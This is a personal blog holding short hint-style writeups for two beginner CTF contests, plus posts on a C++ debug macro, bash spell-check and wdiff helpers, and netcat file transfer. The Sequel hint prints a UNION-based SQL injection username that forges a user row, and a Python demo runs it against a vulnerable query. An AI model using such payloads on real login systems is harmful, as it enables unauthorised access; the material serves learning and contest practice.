Ah! Year 2 of n00b ctf @ backdoor. Quite a nice and fun contest. Though this contest was for n00bs, I decided to take part again (just coz I won last time - find the writeup for those questions here). This time, I came second, since I couldn't solve 2 of the questions, and one other team (dcua) solved all except 1. However, a short while after the contest was done, I solved another. Now only the question titled EULA remains. Hopefully, I'll update this post with its writeup soon too :)
Here's a bunch of writeups (more like small hints) for each of the questions I solved:
Batman
Take a look at the URL as you click on the items. Maybe higher numbered items are interesting (even if they cannot be directly accessed). The Hackbar add-on for Firefox makes this very easy to go through, btw.
Bin-Easy
Okay, I didn't even run the binary. The answer was just lying there in one of the strings (hint hint) inside it. Pre-execution analysis alone turned up the flag.
Bin-Medium
We can disassemble this executable and change the path of execution to either circumvent the check (through gdb) or by flipping one bit in the binary. Each of these would print the flag. Another thing is to try to work out how the flag is being made in the memory, but that's just wasting your time. Take the easy path :P
EULA
Still unsolved by me. However, the Accept-Language HTTP header seems very interesting, especially with values like en, it etc.
Fool
A very high-stakes challenge (it had 150 points), but in a very short while it was obvious that it is a format string bug. After that it is trivial to attack it (read up on FSBs if it isn't). I made a stupid mistake though which took a couple of minutes to realize: I was sending a single quote at the beginning and at the end. Doh!
Frost
A multi byte xor cipher. My favourite tool for this (xortool.py) works directly.
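As an added example (not the contest's files or xortool's code): a small Python recovery of a repeating-key XOR key of the kind Frost used, scoring each key column for English-likeness. The plaintext and key are constructed, and the key length is passed in rather than guessed as xortool would.

```python
# Constructed sample: a stretch of ordinary English and a short key.
# Neither is from the contest; they only exercise the recovery below.
SAMPLE_KEY = b"k3y"
SAMPLE_PLAINTEXT = (
    b"the quick brown fox jumps over the lazy dog while the contest "
    b"organisers watch the scoreboard and every team in the room races "
    b"to recover the repeating key that hides the flag inside this long "
    b"stretch of ordinary english text which is exactly the kind of "
    b"input a frequency based attack expects to see when it runs"
)

# Rough English weights: space and the most common letters score high,
# other lowercase letters score a little, control bytes are penalised.
WEIGHTS = {ord(" "): 13, ord("e"): 12, ord("t"): 9, ord("a"): 8, ord("o"): 7,
           ord("i"): 7, ord("n"): 7, ord("s"): 6, ord("h"): 6, ord("r"): 6}


def xor_repeat(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key byte at the same position mod len(key)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def english_score(buf: bytes) -> int:
    """Higher means the buffer looks more like lowercase English text."""
    score = 0
    for b in buf:
        if b in WEIGHTS:
            score += WEIGHTS[b]
        elif 97 <= b <= 122:                      # other lowercase letters
            score += 2
        elif not (32 <= b <= 126 or b == 10):     # control / high byte
            score -= 20
    return score


def recover_key(ciphertext: bytes, keylen: int) -> bytes:
    """Per key position, pick the byte whose decryption scores best.

    Every ciphertext byte at offset i was XORed with key[i % keylen], so
    the bytes of one column share a single key byte and can be brute-forced
    independently of the others (256 guesses per column).
    """
    key = bytearray()
    for col in range(keylen):
        column = ciphertext[col::keylen]
        best = max(range(256),
                   key=lambda k: english_score(bytes(b ^ k for b in column)))
        key.append(best)
    return bytes(key)


if __name__ == "__main__":
    ct = xor_repeat(SAMPLE_PLAINTEXT, SAMPLE_KEY)
    k = recover_key(ct, len(SAMPLE_KEY))
    print(k, xor_repeat(ct, k)[:40])
```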
Magic
The = at the end gives away that it is base64 encoded. Decoding it gives another cipher but the spacing makes it obvious that it must be some simple ancient cipher. Caesar would be proud.
Matrix
I couldn't solve this challenge during the contest, but solved it just after it, and damn, was I overthinking it. During the contest, I realized that the gs were too regular (every 7th place), so I split it into 32 lines of 6 characters each (after removing the g at the end of each line). All of these were hex digits, and with the 6-character thing, I naturally thought of colours (for example, #00ff00 is green). A lot of time was wasted in this direction, but after the contest and a small hint about transposing the matrix (i.e. making it into 6 rows of 32 characters each), it was obvious that each of those could be a hash. Online MD5 crackers then gave away the answers.
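An added example, not part of the original writeup, of the regroup-and-transpose step in Python. It runs on a constructed blob built from six known MD5 digests laid out the way the puzzle was (32 lines of 6 hex characters, each followed by a g); the word list used to check the digests offline is also constructed.

```python
import hashlib

# Constructed stand-in for the challenge file: six MD5 digests of short
# words, written column-wise as 32 lines of 6 hex characters, each line
# followed by the filler character 'g' that stood out in the real puzzle.
FILLER = "g"
SAMPLE_WORDS = ["hello", "world", "matrix", "ctf", "noob", "flag"]
SAMPLE_DIGESTS = [hashlib.md5(w.encode()).hexdigest() for w in SAMPLE_WORDS]
SAMPLE_BLOB = "".join(
    "".join(d[i] for d in SAMPLE_DIGESTS) + FILLER for i in range(32)
)
HEX = set("0123456789abcdef")


def untangle(blob: str, row_len: int = 6, filler: str = FILLER) -> list:
    """Split the stream into rows of row_len, drop the filler, transpose.

    The puzzle's 32 rows of 6 become 6 strings of 32, i.e. MD5-sized hex.
    Raises ValueError if the filler is not exactly where we expect it,
    which is the quickest check that the guessed layout is wrong.
    """
    rows = []
    for i in range(0, len(blob), row_len + 1):
        chunk = blob[i:i + row_len + 1]
        if len(chunk) != row_len + 1 or chunk[-1] != filler:
            raise ValueError(f"unexpected layout at offset {i}")
        rows.append(chunk[:-1])
    # zip(*rows) walks the columns: column j is the j-th character of every row
    return ["".join(col) for col in zip(*rows)]


def looks_like_md5(s: str) -> bool:
    return len(s) == 32 and set(s) <= HEX


def crack_md5(digest: str, wordlist):
    """Offline stand-in for the online MD5 lookups used in the writeup."""
    for w in wordlist:
        if hashlib.md5(w.encode()).hexdigest() == digest:
            return w
    return None


if __name__ == "__main__":
    for h in untangle(SAMPLE_BLOB):
        print(h, looks_like_md5(h), crack_md5(h, SAMPLE_WORDS))
```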
Rbash
Restricted bash - where cd wasn't allowed. Well, ls -l .. worked, and there was the flag right there to be cat'ed to the screen. Later on, I found out that you could also execute a shell inside this rbash, and then you could do anything you wanted!
Robot
The name of this challenge gave away that we needed to look at robots.txt (that pesky little file that web crawlers are supposed to adhere to, but only lead to attackers finding things they shouldn't).
Wahtzdis
Whoa! That is a lot of data, but seems like the javascript console in the browser nicely handles it. Turns out this is the esoteric language JSFuck.
Did you find any other cool/new ways of solving any of these tasks? If so, leave a comment below.
Wednesday, 13 January 2016
Monday, 5 January 2015
Writeup for n00b15CTF
This is a collection of hints for all the problems in the recently held Capture The Flag (CTF) contest conducted by SDSLabs as a way to get n00bs (beginners) to have a taste of the beautiful world of hacking. It was a pretty fun contest even though it was quite easy.
Test
Use a SHA256 tool. My favourite is to just search for "SHA256 STRING_TO_BE_SHA256" on my default search engine (www.duckduckgo.com)
Location-51
There is a redirect occurring here from http://hack.bckdr.in/LOCATION-51/index.html to http://hack.bckdr.in/LOCATION-51/trap.html. Stop this redirect, and read the source of index.html. The javascript there gives away the flag.
Hidden flag - Easy
Using the Linux file command, we find out that it is an ELF binary, but running it gives nothing. However, running strings on it gives away the flag.
Search
The zip file contains a .txt file which does not look like normal text, so we run file on it. This says that it is a jpeg, so change it to .jpg and open it. It is a QR code. Decode this using some online tool (just search for "QR code decode online" for a large number of free tools) and get a link. The link has the flag.
Lost
The message says Console, so open up console in Firefox. The message then tells you to POST data to a link. Going to this link directly does nothing, but sending it any random POST data (using HackBar addon in Firefox for example) gives the flag.
Hidden flag - Medium
Analyzing the file with IDA Pro shows that there is a function called print_flags() which is not called inside main(). Running this function should print the flag. We can do this by attaching gdb to the binary, breaking the execution and running the print_flags() function.
Clutter
Extracting the file and analyzing with Wireshark shows that there is too much to work with. But exporting all the files and then running strings on them would probably work. However, filtering this is a pain, so I just ran a grep for flag, and the answer is visible near a pastebin title.
No - Signal
Use GIMP or Photoshop to add the images. The flag should be obvious then.
Sound
Slow down and reverse the sound wave using Audacity. Listen to it and it should be obvious what the flag is.
Sequel
Looking at the code, it seems like a SQL injection can be done here. Downloading the database.sdb file and rewriting the source code to start returning data from the database, you realize that there is no user sdslabs in the database. This makes it obvious that you need to add the user. The following username does virtually that: ' UNION SELECT 'sdslabs','sdslabs','sdslabs','sdslabs','0c4ea8f5b344600f78516334254e9e085f2225a42a0bb18fa8bd774589f1ca19' UNION SELECT * FROM users WHERE '0'='1. Note that this query will not work directly; the password will have to be set accordingly.
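An added example (not the challenge's code): the same query shape in Python with sqlite3, showing why the username above yields an sdslabs row when spliced into SQL and why a bound parameter does not. The five-column table layout, the column names and the password are assumptions.

```python
import hashlib
import sqlite3

# Assumed layout for the challenge's users table: the writeup's payload
# supplies five text columns, so five are modelled here (names are guesses).
SCHEMA = """CREATE TABLE users (
    username TEXT, fullname TEXT, email TEXT, role TEXT, password_hash TEXT)"""


def setup_db() -> sqlite3.Connection:
    """In-memory database with one ordinary user and no 'sdslabs' account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.execute("INSERT INTO users VALUES (?,?,?,?,?)",
                 ("alice", "Alice", "alice@example.invalid", "user",
                  hashlib.sha256(b"correct horse").hexdigest()))
    return conn


def fetch_user_vulnerable(conn, username):
    # Challenge-style query: the username is spliced straight into the SQL,
    # so a quote in it closes the string and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE username='" + username + "'"
    return conn.execute(sql).fetchone()


def fetch_user_safe(conn, username):
    # Same query with a bound parameter: the driver never lets the value
    # become SQL, so quotes and UNIONs are just characters to compare against.
    sql = "SELECT * FROM users WHERE username=?"
    return conn.execute(sql, (username,)).fetchone()


def login(conn, fetch, username, password) -> bool:
    """Look the user up, then compare the stored hash with sha256(password)."""
    row = fetch(conn, username)
    return row is not None and row[4] == hashlib.sha256(password.encode()).hexdigest()


def sdslabs_payload(password: str) -> str:
    """The writeup's username, with its hash set to match a chosen password."""
    h = hashlib.sha256(password.encode()).hexdigest()
    return ("' UNION SELECT 'sdslabs','sdslabs','sdslabs','sdslabs','" + h +
            "' UNION SELECT * FROM users WHERE '0'='1")


if __name__ == "__main__":
    db = setup_db()
    payload = sdslabs_payload("n00b-demo")          # constructed password
    print("vulnerable:", login(db, fetch_user_vulnerable, payload, "n00b-demo"))
    print("parameterised:", login(db, fetch_user_safe, payload, "n00b-demo"))
```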
Undisputed
The file is an ext4 filesystem (use the file command if you don't trust the extension). Mount this in Linux using the mount command (read man mount to know how) and then open the file inside to see the flag.
Did you find any other cool/new ways of solving any of these tasks? If so, leave a comment below.
Link to writeup for n00b16ctf
Wednesday, 26 November 2014
Debugging code in a competitive setting, Part 1
Writing code in a competitive setting is an especially tiring and frustrating task, for a multitude of reasons. The rush of wanting to code fast prevents one from applying good coding standards and leads to trivial errors. Also, there is no time to set up a testing framework etc. How do you prevent (or at least find and correct) any errors in the code you write?
What I personally do is to use a combination of gdb and a custom debug message function.
The first part of this series of posts will explain the function.
First, I always put the following code at the start of my programs:
#ifdef DEBUGIT
#define DEBUG(X) cerr << ">>> DEBUG(" << __LINE__ << ") " << #X << " = " << X << endl
#else
#define DEBUG(X) (void)0
#endif
Now, whenever there is a need to check the value of a variable (or expression), all that is left to be done is to call the DEBUG() function like so:
DEBUG(x); // debugging variable x
DEBUG((a<<3)+2); // debugging an expression
The way that the "function" (or macro, to be precise) is defined, whenever DEBUGIT is defined at compilation, debug statements are shown, and otherwise, they are just skipped.
Hence, whenever you want to look at the debug statements, use g++ -DDEBUGIT to compile instead of just g++.
Here's an example program and its output:
#include <iostream>
using namespace std;
#ifdef DEBUGIT
#define DEBUG(X) cerr << ">>> DEBUG(" << __LINE__ << ") " << #X << " = " << X << endl
#else
#define DEBUG(X) (void)0
#endif
int main() {
int x = 5, y = 10;
DEBUG(x);
DEBUG(y);
++x += y++;
DEBUG(y+1);
cout << x << endl;
}
Output:
>>> DEBUG(13) x = 5
>>> DEBUG(14) y = 10
>>> DEBUG(16) y+1 = 12
16
The advantage with the DEBUGIT technique is that you can directly submit code (without any modifications) and the grader will not run the DEBUG statements at all.
I have added the following line to my .bashrc file:
alias d++='g++ -DDEBUGIT'
Hence, I can directly run d++ for compiling with the debug statements.
In my next post, I will explain how to use gdb to further make life easier.
Monday, 24 November 2014
Terminal based Spell Check
Here's a cool little script I wrote (added to my .bashrc file) in order to test spellings, or to generate them when I don't remember them.
function spelling {
    # $1 is a word or a regex; it is anchored so only whole dictionary entries match
    if grep -q "^$1$" /usr/share/dict/american-english; then
        echo -e "Spelling of\e[1;32m" "$(grep -m 1 "^$1$" /usr/share/dict/american-english)" "\e[0mseems fine"
    else
        echo -e "\e[1;31mThere seems to be a mistake in spelling\e[0m"
    fi
}
The script is run quite simply by saying "spelling word-to-be-checked". For example,
spelling look
would say
Spelling of look seems fine
but
spelling louk
would say
There seems to be a mistake in spelling
Where this is extremely useful is when you cannot remember some part of the spelling of a word. For example allitaration or alliteration. Here, I can just use a regex.
Running
spelling allit.ration
would say
Spelling of alliteration seems fine
thereby giving the right spelling.
Wednesday, 22 October 2014
The Easiest Way Ever to Compare 2 Texts
Here's another reason to use Linux: You can use the beautiful terminal tool called wdiff (more useful when only certain words in a sentence may have changed, as opposed to whole sentences or code, in which case, diff is a better tool)
How do you use it? First, you'll have to install it (a simple standard "sudo apt-get install wdiff" is enough - HA! Let's see Windows install anything that easily!)
Then, just use this crazy little command whenever you need to compare two documents:
echo "Enter text1 (press Enter,Ctrl+D when done):"; cat > /tmp/1.txt; echo "Enter text2 (press Enter,Ctrl+D when done):"; cat > /tmp/2.txt; echo "Comparing..."; wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt; rm /tmp/1.txt; rm /tmp/2.txt
Or, let's just make our lives easier and put all of that into a function (therefore, making it more nicely written and easier to understand too)
function 2compare {
echo "Enter text1 (press Enter,Ctrl+D when done):"
cat > /tmp/1.txt
echo "Enter text2 (press Enter,Ctrl+D when done):"
cat > /tmp/2.txt
echo "Comparing..."
wdiff -n -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' -s /tmp/1.txt /tmp/2.txt
rm /tmp/1.txt
rm /tmp/2.txt
}
Now, all you have to do is call 2compare and you will be able to compare texts.
Well, let's break it down, shall we?
The echo parts just show useful messages on the screen.
The cat parts store the data taken as input into temporary locations /tmp/1.txt and /tmp/2.txt
The wdiff part is the scariest bit but is quite simple (as we shall see):
- -n is a short way of saying --avoid-wraps which means "do not extend fields through newlines"
- -w $'\033[1;31m' -x $'\033[0m' -y $'\033[1;32m' -z $'\033[0m' sets up colours to show the differences in a much more easy to see way. wdiff by default shows colourless output (and shows differences using brackets etc.)
- -s or --statistics causes wdiff to show how many words were added, deleted etc.
- /tmp/1.txt /tmp/2.txt just specifies the files to be compared
But what if you don't want to keep rewriting that crazy long function each time you restart your terminal?
You can place it at the end of ~/.bashrc and then you'll be able to use 2compare directly from your terminal next time onwards.
This command is staying in my ~/.bashrc probably permanently from now on. Maybe I'll post some other useful stuff I have in there in later blog posts.
Do you know of any other ways of comparing files? Any new terminal tricks?
Leave your comments below.
Sunday, 28 September 2014
Reaching the network's speed limit for file transfer
Are you tired of transferring files from one computer to another using pen-drives and their abysmally slow speeds? Ever long for something faster? Here's a nice way to transfer files insanely fast - as fast as the network would allow (Note: This is another cool reason to switch to Linux)
Here's what you do:
Let's say you want to send a folder called ABC from computer X to computer Y. Then, fire up terminal on computer Y first and type the following commands:
hostname -I
nc -l 9898 | tar xv
"hostname -I" shows all IP addresses associated with the host Y. You'll need to note these down to be used on computer X. "nc" is a utility that allows for arbitrary TCP and UDP connections and listens. "-l 9898" is a flag for nc to open port 9898 and listen for connections. The "|" pipes the output of nc (i.e. whatever comes from the network) into the next command "tar" which is an archival utility. The "xv" part stands for extract verbose which means that the archive coming from nc is extracted and each file name is printed out as it is extracted.
Once you're done running the above command on Y, run the following command on X:
tar c ABC | nc IP 9898
The "tar c" part stands for "use tar to compress" ABC (the folder to be sent). IP is the IP address obtained from the "hostname -I" command on computer Y. "nc IP 9898" connects to computer Y on port 9898 and sends the data from the tar command to the other computer.
Since no extra data is transferred in this way, the data should be transferred at the maximum (theoretical) limit of your network. If your network is unstable, this might actually cause a problem since no error correction codes are sent; however, if your network is stable (or all you are sending is movies or the like) then it shouldn't matter much.
Do you know of any other fast ways to transfer data on the network? Leave a comment below. :)